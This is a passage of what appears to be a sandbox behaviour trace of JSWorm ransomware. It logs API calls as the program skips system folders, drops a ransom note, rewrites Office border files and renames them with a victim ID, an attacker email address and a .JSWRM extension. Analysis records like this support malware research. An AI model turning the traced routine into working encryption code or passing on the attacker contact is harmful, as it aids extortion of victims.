hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x439704dd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="..", cAlternateFileName="")) returned 1 [0129.072] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.072] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.072] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x439704dd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x439704dd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x439704dd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.072] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0129.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0129.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0129.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0129.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0129.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0129.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0129.073] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7df6, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART1.BDR", cAlternateFileName="")) returned 1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2=".") returned 1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="..") returned 1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="...") returned 1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="windows") returned -1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="recovery") returned -1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="perflogs") returned -1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="documents and settings") returned 1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="system volume information") returned -1 [0129.073] lstrcmpiW (lpString1="MSART1.BDR", lpString2="msocache") returned -1 [0129.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0129.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART1.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART1.BDR", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART1.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0129.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0129.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART1.BDR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART1.BDR", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART1.BDR", lpUsedDefaultChar=0x0) returned 10 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0129.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0129.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0129.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0129.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART1.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart1.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.075] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32246) returned 1 [0129.075] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7df0) returned 0x27b348 [0129.076] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7df0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7df0, lpOverlapped=0x0) returned 1 [0129.082] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.082] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7df0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7df0, lpOverlapped=0x0) returned 1 [0129.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.082] CloseHandle (hObject=0x238) returned 1 [0129.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0129.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0129.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0129.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0129.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0129.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0129.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0129.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0129.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0129.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0129.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0129.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0129.083] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART1.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart1.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART1.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart1.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0129.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0129.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0129.084] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x244c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART10.BDR", cAlternateFileName="")) returned 1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2=".") returned 1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="..") returned 1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="...") returned 1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="windows") returned -1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="recovery") returned -1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="perflogs") returned -1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="documents and settings") returned 1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="system volume information") returned -1 [0129.084] lstrcmpiW (lpString1="MSART10.BDR", lpString2="msocache") returned -1 [0129.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0129.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART10.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART10.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART10.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0129.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0129.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART10.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART10.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART10.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0129.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0129.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0129.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0129.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART10.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart10.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.085] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9292) returned 1 [0129.086] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2440) returned 0x27b348 [0129.086] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2440, lpOverlapped=0x0) returned 1 [0129.105] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.105] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2440, lpOverlapped=0x0) returned 1 [0129.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.106] CloseHandle (hObject=0x238) returned 1 [0129.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0129.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0129.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0129.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0129.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0129.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0129.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0129.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0129.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0129.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0129.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0129.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0129.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0129.106] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART10.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart10.bdr"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART10.BDR.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart10.bdr.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0129.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0129.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0129.108] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78c8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="MSART11.BDR", cAlternateFileName="")) returned 1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2=".") returned 1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="..") returned 1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="...") returned 1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="windows") returned -1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="recovery") returned -1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="perflogs") returned -1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="documents and settings") returned 1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="$RECYCLE.BIN") returned 1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="system volume information") returned -1 [0129.108] lstrcmpiW (lpString1="MSART11.BDR", lpString2="msocache") returned -1 [0129.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0129.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART11.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART11.BDR", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART11.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0129.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0129.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART11.BDR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSART11.BDR", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSART11.BDR", lpUsedDefaultChar=0x0) returned 11 [0129.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0129.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0129.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0129.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0129.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\BORDERS\\MSART11.BDR" (normalized: "c:\\program files\\microsoft office\\root\\office16\\borders\\msart11.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.109] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30920) returned 1 [0129.109] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x78c0) returned 0x27b348 [0129.109] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x78c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x78c0, lpOverlapped=0x0) returned 1 [0129.112] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.112] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x78c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x78c0, lpOverlapped=0x0) returned 1 [0129.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0129.113] CloseHandle (hObject=0x238) returned 1 [0129.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0129.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0129.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0129.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 